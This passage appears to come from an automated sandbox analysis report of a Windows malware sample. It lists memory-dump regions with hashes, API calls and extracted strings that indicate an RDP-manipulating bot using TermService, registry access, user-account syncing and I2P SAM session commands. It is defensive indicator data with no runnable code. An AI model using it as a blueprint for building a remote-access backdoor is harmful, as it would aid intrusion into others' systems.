                                                                                                                                                  • Opcode Fuzzy Hash: 6b8a36cc971b699367ac3bf5157fbd41f4ace45a84db308636fec646c69488e6
                                                                                                                                                  • Instruction Fuzzy Hash: 97512A60A0C7C782F7215F1CA4C43782251AF153F4F760336DB6E463E2DE6DA986B282
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                                                  • Opcode ID: 9f20d362d937536f0ee4103508d9b1139d0d6585478f89b21611969e913930d6
                                                                                                                                                  • Instruction ID: 34251e4118015d1a3cd8e34aa02af7461437978ae0d5fac4d080070c235717f1
                                                                                                                                                  • Opcode Fuzzy Hash: 9f20d362d937536f0ee4103508d9b1139d0d6585478f89b21611969e913930d6
                                                                                                                                                  • Instruction Fuzzy Hash: 45512666A0C74392FA2057DCA4E53786362AF053F5F280632C76E063E1DE6EB9A58711
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                                                  • Opcode ID: 0b0dd3b090767c9c6ff8a136659d1bb65f72dbfd72b78c7ca576c1129c5fc752
                                                                                                                                                  • Instruction ID: 7029d1a61f42383389ed57fb7f42d51e057ae3b48eec118ce04ae9991a799835
                                                                                                                                                  • Opcode Fuzzy Hash: 0b0dd3b090767c9c6ff8a136659d1bb65f72dbfd72b78c7ca576c1129c5fc752
                                                                                                                                                  • Instruction Fuzzy Hash: 4B51F210A0C74792FB706BDC94C43B8A3599F857E5F644336C72E562D3EE9EA885D301
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                                                                                                                                  • String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
                                                                                                                                                  • API String ID: 1423203057-595982613
                                                                                                                                                  • Opcode ID: 80942592db8f3c253b1855c65e91fcdc3096fbaa6f48945d97735cc1c0d4eca0
                                                                                                                                                  • Instruction ID: 96ee7a4bf8d00ee03678c203f215bf41c92880a4e349fc34cab30f0307e787ad
                                                                                                                                                  • Opcode Fuzzy Hash: 80942592db8f3c253b1855c65e91fcdc3096fbaa6f48945d97735cc1c0d4eca0
                                                                                                                                                  • Instruction Fuzzy Hash: 70A19F62B0968281EB30CB59F840BB96B61EB79B84F498036FF4D87695DE2DE565C300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-2022313065
                                                                                                                                                  • Opcode ID: 352408240713be7a7cb69aa9724280b692f81e1d013cd9d5b02acbcca2736477
                                                                                                                                                  • Instruction ID: 16fca1961dd5dd73354f34e18ce201fec5fabc6531d0c0aa31e7106c60f0f4d5
                                                                                                                                                  • Opcode Fuzzy Hash: 352408240713be7a7cb69aa9724280b692f81e1d013cd9d5b02acbcca2736477
                                                                                                                                                  • Instruction Fuzzy Hash: 71A15E60D0C70B81F630974CB941B7962B1AF38748F540033FB4ED6AB5EEADA9A5D702
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$AllocCreateEnterLeaveProcessThread
                                                                                                                                                  • String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
                                                                                                                                                  • API String ID: 3282357527-375624272
                                                                                                                                                  • Opcode ID: e3d8a866335234c7172628d04091ce46b344c8073fa7ebe3eec0b8b2a0812a7e
                                                                                                                                                  • Instruction ID: c5913ead947c704b038ce8be45d1e6854d2b467306ee1a62ee91f893d32f88dc
                                                                                                                                                  • Opcode Fuzzy Hash: e3d8a866335234c7172628d04091ce46b344c8073fa7ebe3eec0b8b2a0812a7e
                                                                                                                                                  • Instruction Fuzzy Hash: 5E514C20E8860381FA149B9DE9117B963A2AF41BF4F154339DB3E47BD6DE3CE4459311
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                                                                                                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                                                                                                  • API String ID: 2122475568-588975189
                                                                                                                                                  • Opcode ID: ea011fd3911eba31b5ed846103687ee14d0c618340a10d4a4ea74dd2289fbe6d
                                                                                                                                                  • Instruction ID: 3a0847368ca690a1cbb1cebd95ad61e1a1bf52fa469016e148e31c5da22fb28e
                                                                                                                                                  • Opcode Fuzzy Hash: ea011fd3911eba31b5ed846103687ee14d0c618340a10d4a4ea74dd2289fbe6d
                                                                                                                                                  • Instruction Fuzzy Hash: 91513AB6A08B82C6EB51CF29E45436977A1FB89B88F414136DB4D93398DF3CE849D700
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                                                                                                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                                                                                                  • API String ID: 2122475568-588975189
                                                                                                                                                  • Opcode ID: 094797508034af9aeb41acd87ce8deab58e064fb6417c2c767a88e0e44c012d1
                                                                                                                                                  • Instruction ID: 79bdf4cb8667eeb3b6299c793f2a5ee148412940fac0a96798b0615e700eaa36
                                                                                                                                                  • Opcode Fuzzy Hash: 094797508034af9aeb41acd87ce8deab58e064fb6417c2c767a88e0e44c012d1
                                                                                                                                                  • Instruction Fuzzy Hash: EF513AB6A08B82C6EB50CF29E45436977A1FB89B88F414136DB4D93398DF3CE849D700
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                      • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                                                                                                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                                                                                                  • API String ID: 2122475568-588975189
                                                                                                                                                  • Opcode ID: 49a18e276fb8c6a2b4951d3360f840af0e0b91061dc9137376a5f74894fb3ec4
                                                                                                                                                  • Instruction ID: 41532de57c3a43ad13ea21e72bebefd2e5ccda475562b428649cad0a4ac4abe3
                                                                                                                                                  • Opcode Fuzzy Hash: 49a18e276fb8c6a2b4951d3360f840af0e0b91061dc9137376a5f74894fb3ec4
                                                                                                                                                  • Instruction Fuzzy Hash: 71513AB6A08B82C6EB50CF29E45436977A1FB89B88F414136DB4D93798DF3CE849D700
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                      • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                                                                                                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                                                                                                  • API String ID: 2122475568-588975189
                                                                                                                                                  • Opcode ID: 5d1318e734e99b6aa77c2af95f36f6a0782a97f835af939cec4f9924c6791811
                                                                                                                                                  • Instruction ID: 6653e074592b01f497bee35a026935ab8b2fe29c32cb863a5773a88799eea484
                                                                                                                                                  • Opcode Fuzzy Hash: 5d1318e734e99b6aa77c2af95f36f6a0782a97f835af939cec4f9924c6791811
                                                                                                                                                  • Instruction Fuzzy Hash: 80513BB6A08B82C6EB50CF19E45436977A1FB89B88F414136DB4D93358DF3CE849D700
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                      • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
                                                                                                                                                  • String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
                                                                                                                                                  • API String ID: 546114577-3142219161
                                                                                                                                                  • Opcode ID: 3cdc24c023b89066df0a726aa4c710322b7b89a6d544cc8f507da3a1f5a289d7
                                                                                                                                                  • Instruction ID: d1e2669f39e1dfac3790c993e58b57cdef4c05211904b549cc9ef3edb54e015d
                                                                                                                                                  • Opcode Fuzzy Hash: 3cdc24c023b89066df0a726aa4c710322b7b89a6d544cc8f507da3a1f5a289d7
                                                                                                                                                  • Instruction Fuzzy Hash: 1541EA10B0CAC3A2FB208F5CA8C03B812559F163D8F525032C75F6A2E2AE5DBD86B715
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                      • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
                                                                                                                                                  • String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                                                                                                                                  • API String ID: 610085118-1825955162
                                                                                                                                                  • Opcode ID: 976fff96366d5551afc8c362ad483118ae7add20c4f03ef8fba7955228ba521d
                                                                                                                                                  • Instruction ID: be53372d4aab48c2a8cd2ee85bd74ee9d1f1229680f1ee49bdfd9ee54e069830
                                                                                                                                                  • Opcode Fuzzy Hash: 976fff96366d5551afc8c362ad483118ae7add20c4f03ef8fba7955228ba521d
                                                                                                                                                  • Instruction Fuzzy Hash: 58513731A89B4382EB659B89EA50679B3A1EF84BC0F184139EB5E43B65DF3CE4459340
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                      • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                                                                                                                                  • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                                                                                                                                  • API String ID: 1721699506-2273971785
                                                                                                                                                  • Opcode ID: fb69f4271079308d6a773b76607419c5d5bd62e2c2092df690b093a9c085742d
                                                                                                                                                  • Instruction ID: ccb10189459f1b3c87149a3b83366f1392d2e0875374105a6c27fee70dfb0798
                                                                                                                                                  • Opcode Fuzzy Hash: fb69f4271079308d6a773b76607419c5d5bd62e2c2092df690b093a9c085742d
                                                                                                                                                  • Instruction Fuzzy Hash: 3E616D61E0C54785FA308B5CE940BB82272AFB9798F554133F74ECB694DE3CE9668301
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                      • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CompareFileTime
                                                                                                                                                  • String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
                                                                                                                                                  • API String ID: 342285119-844192579
                                                                                                                                                  • Opcode ID: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
                                                                                                                                                  • Instruction ID: 5ec49a44ea275eaf98a0a2e00c77040399e4fb0a871c3d7812d6e86838ea2dd3
                                                                                                                                                  • Opcode Fuzzy Hash: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
                                                                                                                                                  • Instruction Fuzzy Hash: 8B519321B0C6C341FB219F2AA8D43BA5691AF857C4F464031EB9D4B7C7EE6DE905B740
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                      • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait
                                                                                                                                                  • String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
                                                                                                                                                  • API String ID: 4048354325-2700516951
                                                                                                                                                  • Opcode ID: 4dff84fd8bfcbedcf79c475886653c1940979e13b65d628549cf3edeea3474e1
                                                                                                                                                  • Instruction ID: e14571fee02a8e7e5012417e383ac2db11643fc1e2ea79cda766e505de351d57
                                                                                                                                                  • Opcode Fuzzy Hash: 4dff84fd8bfcbedcf79c475886653c1940979e13b65d628549cf3edeea3474e1
                                                                                                                                                  • Instruction Fuzzy Hash: 65410C25E89A0782FF549FA9D96067463A1AF48BE4F184639DF2D463E5DE3CE4448310
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                      • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                                                      • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcpystrlen$strcmp
                                                                                                                                                  • String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
